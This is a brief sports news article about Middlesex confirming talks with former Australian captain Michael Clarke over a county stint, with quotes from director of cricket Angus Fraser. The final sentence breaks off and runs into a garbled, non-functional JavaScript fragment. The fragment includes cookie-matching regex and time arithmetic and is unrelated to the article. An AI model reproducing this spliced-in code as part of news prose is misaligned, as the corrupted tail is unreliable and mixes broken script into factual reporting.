Michael Clarke is in talks about a return to first-class cricket in England, County side Middlesex has confirmed.

The club confirmed that they have been in discussions with Clarke about a possible stint for the side later this year.

The UK Telegraph has reported that the former Australian captain will be available for five first-class matches, four one-day matches and seven T20 fixtures for the club.

"We are in discussions with a number of players and I would be lying if I said his name had not been mentioned,” Middlesex director of cricket Angus Fraser said in an interview with the UK Telegraph.

"There is a long way to go before a serious conversation takes place.

"It will come down to him at the end of the day. He has to decide if he is fit and wants to do it.

"Then we have to see what we want and if he fits the bill."

Clarke announced his comeback to competitive cricket last month after officially retiring in August last year. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
